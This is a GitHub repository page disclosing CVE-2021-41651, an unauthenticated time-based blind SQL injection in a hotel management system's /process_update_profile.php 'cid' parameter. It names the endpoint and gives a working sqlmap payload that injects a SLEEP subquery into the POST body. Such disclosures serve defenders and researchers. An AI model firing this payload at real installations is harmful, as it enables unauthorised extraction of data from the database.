CVE-2021-41651

CVE-2021-41651 SQL Injection in hotel-mgmt-system

The hotel-mgmt-system is vulnerable to un-authenticated time based blind SQL Injection attack.

The cid parameter on the /process_update_profile.php page does not sanitize the user input, an attacker can extract sensisitive data from the underlying MySQL Database.

Link To Application

hotel-mgmt-system

Affected Components & Parameter

URL: /process_update_profile.php
PARAMETER: cid

Poc's

SQLMAP PAYLOADS

cid parameter on the /process_update_profile.php page

Parameter: cid ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&email=me@you.com&newPassword=fasdfasdfasdfasdfasdf-

If the POC Image is unclear, please click on the GIF which will load in a better resolution.

Discovered by

Jason Colyvas
MOBIUSBINARY
September 23rd, 2021

Name		Name	Last commit message	Last commit date
Latest commit History 6 Commits
README.md		README.md
hotel.gif		hotel.gif

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2021-41651

Link To Application

Affected Components & Parameter

Poc's

SQLMAP PAYLOADS

cid parameter on the /process_update_profile.php page

If the POC Image is unclear, please click on the GIF which will load in a better resolution.

Discovered by

About

Releases

Packages

MobiusBinary/CVE-2021-41651

Folders and files

Latest commit

History

Repository files navigation

CVE-2021-41651

Link To Application

Affected Components & Parameter

Poc's

SQLMAP PAYLOADS

cid parameter on the /process_update_profile.php page

If the POC Image is unclear, please click on the GIF which will load in a better resolution.

Discovered by

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages